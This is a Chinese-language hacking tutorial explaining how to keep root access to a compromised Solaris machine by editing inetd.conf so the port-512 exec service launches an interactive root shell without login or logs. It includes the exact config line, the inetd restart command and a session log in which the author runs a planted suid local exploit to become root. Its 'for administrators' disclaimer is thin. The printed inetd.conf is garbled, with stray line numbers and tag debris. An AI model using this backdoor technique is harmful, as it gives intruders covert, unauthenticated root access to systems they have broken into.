利用inetd来绑系统后门实例
声明:本文的目的在于提醒各企业的系统原理员作安全检测之用,如用于其他用途,后果自负。
好不容易通过猜密码,找漏洞,溢出等方法拿到了root权是不是想保留住,用来以后用呢,呵呵,许多初学者都喜欢在passwd或shadow档里加一空密码的root帐户(密码后门),或是干脆放一本地溢出的suid程序,再就是绑端口了,呵呵
前两种方法都会轻易被系统原理员发现,我介绍的是后一种,比较隐蔽的绑端口的方法,使后门程序在进程表项里隐藏。好,下面切入正题。
先拿到root,打开inetd.conf文件,我们看看,找一个用inetd起的进程,这里我选512端口,因为他本身就是inetd里的一部分,不会太引起管理员的注意,也可以在inetd.conf里加一条高端位的,但只要管理员细心点,就一定会发现的。
步骤如下:
先拿到root,用vi inetd.conf找一项用root启动的服务,比如512的exec服务把注释去掉,修改如下:
exec stream tcp nowait root /bin/sh /bin/sh -i
重起inetd服务:# kill -HUP {inetd proc id}
就这么简单,然后你可以从你的本机,不用在telnet了,什么输用户名密码了,直接连进端口,而且不会留日志。
举个例子吧:
这是我绑的一个全过程!
SunOS 5.6
login: eagle
Password:
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
You have new mail.
sdns% cd /usr/ucb/.../.../
sdns% sys (sys是我以前放在这里的suid本地溢出程序)
(成为root)
#more /etc/inetd.conf
#ident "@(#)inetd.conf 1.27 96/09/24 SMI" /* SVr4.0 1.5 */
Configuration file for inetd(1M). See inetd.conf(4).
To re-configure the running inetd process, edit this file, then
send the inetd process a SIGHUP.
Syntax for socket-based Internet services:
1<service_name> <socket_type> <proto> <flags> <user> <server_pathname> <args>
2#
3# Syntax for TLI-based Internet services:
4#
5# <service_name> tli <proto> <flags> <user> <server_pathname> <args>
6#
7# Ftp and telnet are standard Internet services.
8#
9ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd
10telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd
11#
12# Tnamed serves the obsolete IEN-116 name server protocol.
13#
14name dgram udp wait root /usr/sbin/in.tnamed in.tnamed
15#
16# Shell, login, exec, comsat and talk are BSD protocols.
17#
18shell stream tcp nowait root /usr/sbin/in.rshd in.rshd
19login stream tcp nowait root /usr/sbin/in.rlogind in.rlogind
20exec stream tcp nowait root /usr/sbin/in.rexecd in.execd
21comsat dgram udp wait root /usr/sbin/in.comsat in.comsat
22talk dgram udp wait root /usr/sbin/in.talkd in.talkd
23#
24# Must run as root (to read /etc/shadow); "-n" turns off logging in utmp/wtmp.
25#
26uucp stream tcp nowait root /usr/sbin/in.uucpd in.uucpd
27#
28# Tftp service is provided primarily for booting. Most sites run this
29# only on machines acting as "boot servers."
30#
31#tftp dgram udp wait root /usr/sbin/in.tftpd in.tftpd -s /tft
32pboot
33#
34# Finger, systat and netstat give out user information which may be
35# valuable to potential "system crackers." Many sites choose to disable
36# some or all of these services to improve security.
37#
38finger stream tcp nowait nobody /usr/sbin/in.fingerd in.fingerd
39#systat stream tcp nowait root /usr/bin/ps ps -ef
40#netstat stream tcp nowait root /usr/bin/netstat netstat
41-f inet
42#
43# Time service is used for clock synchronization.
44#
45time stream tcp nowait root internal
46time dgram udp wait root internal
47#
48# Echo, discard, daytime, and chargen are used primarily for testing.
49#
50echo stream tcp nowait root internal
51echo dgram udp wait root internal
52discard stream tcp nowait root internal
53discard dgram udp wait root internal
54daytime stream tcp nowait root internal
55daytime dgram udp wait root internal
56chargen stream tcp nowait root internal
57chargen dgram udp wait root internal
58#
59#
60# RPC services syntax:
61# <rpc_prog>/<vers> <endpoint-type> rpc/<proto> <flags> <user> \
62# <pathname> <args>
63#
64# <end</args></pathname></user></flags></proto></endpoint-type></vers></rpc_prog></args></server_pathname></user></flags></proto></service_name></args></server_pathname></user></flags></proto></socket_type></service_name>